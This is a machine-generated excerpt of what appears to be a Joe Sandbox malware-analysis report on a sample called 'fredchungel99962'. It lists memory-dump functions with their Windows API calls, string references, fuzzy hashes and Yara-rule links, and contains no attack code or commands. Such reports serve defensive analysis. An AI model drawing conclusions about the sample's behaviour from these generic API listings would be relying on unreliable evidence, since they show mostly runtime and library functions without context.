Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 6a7c5540f9edf4a96b209194dae8c746e6f078404bde506d20881b15be16db73
Instruction ID: 1701fb27ec793d4c9ade1e21cecd90c3d5ff7ec67509d708ff7afee4f1841063
Opcode Fuzzy Hash: 6a7c5540f9edf4a96b209194dae8c746e6f078404bde506d20881b15be16db73
Instruction Fuzzy Hash: 73910675A003299FDB11EFA8C984BFEB7B9FF45718F104019EA50EB291D774A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012C948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 67db6cd94da53a138343b77f110795bddfdb587a12911c28a5dfaeecdd581b7e
Instruction ID: 9f1d0dfdc0de3935d2bff193dab4856d6041da93f20cf62e1739431ceb6fd491
Opcode Fuzzy Hash: 67db6cd94da53a138343b77f110795bddfdb587a12911c28a5dfaeecdd581b7e
Instruction Fuzzy Hash: 48914A71D1021AAFDF10CFA9C884AEEBBB8FF49724F148149E615B7291D774A981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01333947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0133396B
CharUpperBuffW.USER32(?,?), ref: 01333A7A
_wcslen.LIBCMT ref: 01333A8A
VariantClear.OLEAUT32(?), ref: 01333C1F

Part of subcall function 01320CDF: VariantInit.OLEAUT32(00000000), ref: 01320D1F
Part of subcall function 01320CDF: VariantCopy.OLEAUT32(?,?), ref: 01320D28
Part of subcall function 01320CDF: VariantClear.OLEAUT32(?), ref: 01320D34

Strings

AUTOIT.ERROR, xrefs: 01333A80, 01333A85
Incorrect Parameter format, xrefs: 013339A6, 01333BA1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 139eb663e47fc0b8f6d42b8eb0791224d0b74ff4d1eeaccedc7e0a3a8cd8f56c
Instruction ID: 6f7185951fcd929152631f03ea3039fb58912ed8f14cdb13bb25146858c87816
Opcode Fuzzy Hash: 139eb663e47fc0b8f6d42b8eb0791224d0b74ff4d1eeaccedc7e0a3a8cd8f56c
Instruction Fuzzy Hash: 52915975A083469FCB04DF28C48096ABBE4FFC8718F04892DF9899B350DB30E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01334BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0131000E: CLSIDFromProgID.OLE32 ref: 0131002B
Part of subcall function 0131000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 01310046
Part of subcall function 0131000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0130FF41,80070057,?,?), ref: 01310054
Part of subcall function 0131000E: CoTaskMemFree.OLE32(00000000), ref: 01310064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 01334C51
_wcslen.LIBCMT ref: 01334D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01334DCF
CoTaskMemFree.OLE32(?), ref: 01334DDA

Strings

NULL Pointer assignment, xrefs: 01334E23, 01334E52

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 293277fa8e4f53940a1aed16d7276d2e47a9c29f88ade11e6ff3174e7e55c6b0
Instruction ID: c93ccd1e5ada48e37881276f24299af35a5e70de63a4483c80b3ee0c01c651d7
Opcode Fuzzy Hash: 293277fa8e4f53940a1aed16d7276d2e47a9c29f88ade11e6ff3174e7e55c6b0
Instruction Fuzzy Hash: A491F871D0021DEFDF15DFA4D890AEDBBB8BF58354F10416AE919A7250EB30AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 013420FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32 ref: 01342183
GetMenuItemCount.USER32(00000000), ref: 013421B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 013421DD
_wcslen.LIBCMT ref: 01342213
GetMenuItemID.USER32(?,?), ref: 0134224D
GetSubMenu.USER32 ref: 0134225B

Part of subcall function 01313A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01313A57
Part of subcall function 01313A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,013125B3), ref: 01313A5E
Part of subcall function 01313A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 01313A65

PostMessageW.USER32 ref: 013422E3

Part of subcall function 0131E97B: Sleep.KERNEL32 ref: 0131E9F3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: c8ccce619cc9497ae5ebae4c2fa4d405eab470804582a51969c6b5596d9078e4
Instruction ID: 01c5158f329979e3ee410d94404911e0c52975585afad036cce02828d9a49fb2
Opcode Fuzzy Hash: c8ccce619cc9497ae5ebae4c2fa4d405eab470804582a51969c6b5596d9078e4
Instruction Fuzzy Hash: CF718C75A00205AFCB14DF69D880AAEBBF5EF88324F148499E916FB344DB34B9418F90

Uniqueness

Uniqueness Score: -1.00%

Function 0131AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0131AEF9
GetKeyboardState.USER32(?), ref: 0131AF0E
SetKeyboardState.USER32(?), ref: 0131AF6F
PostMessageW.USER32 ref: 0131AF9D
PostMessageW.USER32 ref: 0131AFBC
PostMessageW.USER32 ref: 0131AFFD
PostMessageW.USER32 ref: 0131B020

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ba34361143a9ab11e4aefcd13bc6009fc8201c00f634138c1711e35c82c655d2
Instruction ID: c28e89ab9629df9359ab31ae4e13a67ee89c3fcdd994fea52ea0dc4448a4061f
Opcode Fuzzy Hash: ba34361143a9ab11e4aefcd13bc6009fc8201c00f634138c1711e35c82c655d2
Instruction Fuzzy Hash: E351D8A06057D53DFB3B423CCC45BBABEE95B06309F088589E2D9564CBC7D8A8D8D760

Uniqueness

Uniqueness Score: -1.00%

Function 0131ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0131AD19
GetKeyboardState.USER32(?), ref: 0131AD2E
SetKeyboardState.USER32(?), ref: 0131AD8F
PostMessageW.USER32 ref: 0131ADBB
PostMessageW.USER32 ref: 0131ADD8
PostMessageW.USER32 ref: 0131AE17
PostMessageW.USER32 ref: 0131AE38

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4646cea395cec402ca479d80cc6d0f3e9032d60333f04525993c5746cca2ef63
Instruction ID: 49d3e86ba2fbe0c0e61b3ce270fda8ed27bf621b9c540a0c7f455de0fe543092
Opcode Fuzzy Hash: 4646cea395cec402ca479d80cc6d0f3e9032d60333f04525993c5746cca2ef63
Instruction Fuzzy Hash: C85109A15067D53EFB3B83388C55BBABEE85F4630AF088488E1D9474C7C694E898D760

Uniqueness

Uniqueness Score: -1.00%

Function 012E542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 012E5470
__fassign.LIBCMT ref: 012E54EB
__fassign.LIBCMT ref: 012E5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,012F3CD6,00000005,00000000,00000000), ref: 012E552C
WriteFile.KERNEL32(?,012F3CD6,00000000,012E5BA3,00000000), ref: 012E554B
WriteFile.KERNEL32(?,?,00000001,012E5BA3,00000000), ref: 012E5584

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 51d13d3d83c24f79c3eb1020601a37b74395b7e9a2bb0139d0bb736c239055e0
Instruction ID: f027a04b423ecdf94b01521e99fa37bd968069ebf373c54a309c0e92dbe84c03
Opcode Fuzzy Hash: 51d13d3d83c24f79c3eb1020601a37b74395b7e9a2bb0139d0bb736c239055e0
Instruction Fuzzy Hash: 1F510875A202099FDB10CFA8D849AEEBBF9FF08304F14411AF655E7281D730EA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01346B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 01346C33
SetWindowLongW.USER32 ref: 01346C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01346C73
ShowWindow.USER32(00000002,00000000), ref: 01346C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 01346CC7

Strings

8lr, xrefs: 01346BB0, 01346C55

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID: 8lr
API String ID: 3688381893-2725927297
Opcode ID: ef54cca4fa7d17971711e6cf521bf823f882d5379b16c159f3d3502d2b2a0540
Instruction ID: 782e00744f6aef107fda4f51d339eedc4b0da4b4544e5b6abe0c976844bac023
Opcode Fuzzy Hash: ef54cca4fa7d17971711e6cf521bf823f882d5379b16c159f3d3502d2b2a0540
Instruction Fuzzy Hash: D141A4B5E04104AFEB24CF6DCC46FA97FE9EB0A368F050268E915A72D0C771BD41CA94

Uniqueness

Uniqueness Score: -1.00%

Function 012D2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 012D2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 012D2D53
_ValidateLocalCookies.LIBCMT ref: 012D2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 012D2E0C
_ValidateLocalCookies.LIBCMT ref: 012D2E61

Strings

csm, xrefs: 012D2DF6

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f447a3f28004576201006a560c65706b773ee09f273b7be259e73245b85f86e0
Instruction ID: 3d3e3a37d9bb1be7aaa289d9e695a748b440bd92458b9e4dc5231028e09d15dd
Opcode Fuzzy Hash: f447a3f28004576201006a560c65706b773ee09f273b7be259e73245b85f86e0
Instruction Fuzzy Hash: 0D41C334E2020AEBCF10DF68C845AAEBFB5BF45324F148155EA14AB391D732EA05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 013310B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0133304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0133307A
Part of subcall function 0133304E: _wcslen.LIBCMT ref: 0133309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01331112
WSAGetLastError.WSOCK32 ref: 01331121
WSAGetLastError.WSOCK32 ref: 013311C9
closesocket.WSOCK32(00000000), ref: 013311F9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 800c163ef905e54b0ed6a24e8d96200d1edb01eb5eec74054e7b9a36a15b56dc
Instruction ID: 61ee59a43a36f9d0e05c312791f068b15c3de565e180c88b470af4e3d67bed16
Opcode Fuzzy Hash: 800c163ef905e54b0ed6a24e8d96200d1edb01eb5eec74054e7b9a36a15b56dc
Instruction Fuzzy Hash: 1B41D735600105AFDB109F18C884BE9BBE9FF85368F048159FC159B295CB74AD41CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0131CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0131DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0131CF22,?), ref: 0131DDFD

Part of subcall function 0131DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0131CF22,?), ref: 0131DE16

lstrcmpiW.KERNEL32(?,?), ref: 0131CF45
MoveFileW.KERNEL32 ref: 0131CF7F
_wcslen.LIBCMT ref: 0131D005
_wcslen.LIBCMT ref: 0131D01B
SHFileOperationW.SHELL32(?), ref: 0131D061

Strings

\*.*, xrefs: 0131CFF3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 1ed071d729f855c27b97d5c96bc497fd3ea5f94bf5248d5d9298ca56247dcf43
Instruction ID: a9bf6603bffcea057de69179b1f81615720641ad961599e7cddedea85b2a9bac
Opcode Fuzzy Hash: 1ed071d729f855c27b97d5c96bc497fd3ea5f94bf5248d5d9298ca56247dcf43
Instruction Fuzzy Hash: 024186B184521D9FDF16EFA4C981AEDB7BCAF18384F0010E6D605EB145EB34A788CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01343D7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 01343E35
IsMenu.USER32(?), ref: 01343E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01343E92
DrawMenuBar.USER32 ref: 01343EA5

Strings

0, xrefs: 01343D89
8lr, xrefs: 01343DF7, 01343E12

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0$8lr
API String ID: 3076010158-359200609
Opcode ID: 2d2b6d1d1668d67a0db23c21341b614dc4162ace3b7ee72b4a31d8de22242259
Instruction ID: fcd44f327cc6f748420c15940f3e5d5f6189a023d84ee515715e59da3f6e4ed7
Opcode Fuzzy Hash: 2d2b6d1d1668d67a0db23c21341b614dc4162ace3b7ee72b4a31d8de22242259
Instruction Fuzzy Hash: D3416A76A02219EFDB20DF54D884AAABBF9FF48358F044069E91997250D730B985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01317726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01317769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0131778F
SysAllocString.OLEAUT32(00000000), ref: 01317792
SysAllocString.OLEAUT32(?), ref: 013177B0
SysFreeString.OLEAUT32(?), ref: 013177B9
StringFromGUID2.OLE32(?,?,00000028), ref: 013177DE
SysAllocString.OLEAUT32(?), ref: 013177EC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 96b8ddd0915f1833b7db8f2fa93abcdc4e332eab3acdf5e80acb2100e7287daa
Instruction ID: 2722f5a07696b72b8527a7af97e47408e2369589d068423df44a7cec7d507f92
Opcode Fuzzy Hash: 96b8ddd0915f1833b7db8f2fa93abcdc4e332eab3acdf5e80acb2100e7287daa
Instruction Fuzzy Hash: D921D87A601219AFDF15DEACCC84CBB77ACEB09764F048025FA15DB255DA74EC418760

Uniqueness

Uniqueness Score: -1.00%

Function 013177FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01317842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01317868
SysAllocString.OLEAUT32(00000000), ref: 0131786B
SysAllocString.OLEAUT32 ref: 0131788C
SysFreeString.OLEAUT32 ref: 01317895
StringFromGUID2.OLE32(?,?,00000028), ref: 013178AF
SysAllocString.OLEAUT32(?), ref: 013178BD

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7133e7115c78d48cf1e7a5decf3bfc920746bf80924f3a85aa6c8cb3eabd340e
Instruction ID: 74289e6bb615ffb95f5f19651fe1cb667ba64e6db07d868e0f3776c0931cd610
Opcode Fuzzy Hash: 7133e7115c78d48cf1e7a5decf3bfc920746bf80924f3a85aa6c8cb3eabd340e
Instruction Fuzzy Hash: 7421C435600108AFDB14AFACCC89DBA7BECEB08764B148125F915CB2A9DA74EC41CB74

Uniqueness

Uniqueness Score: -1.00%

Function 013205A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 013205C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01320601

Strings

nul, xrefs: 01320639

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 4f500aceb81d514bde6179f6d3c5871b13e3d6a44dbd730b2572df649a31ae29
Instruction ID: 99379a9013ee62aecd4a8a74effc038e9ddea4fd9a91c44c118094d3f1829cee
Opcode Fuzzy Hash: 4f500aceb81d514bde6179f6d3c5871b13e3d6a44dbd730b2572df649a31ae29
Instruction Fuzzy Hash: FE2183755003259FEB34AF6DC844A5A7BE8EF85738F300A19F9A1E72E4DBB09554CB10

Uniqueness

Uniqueness Score: -1.00%

Function 013204D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 013204F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0132052E

Strings

nul, xrefs: 01320567

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

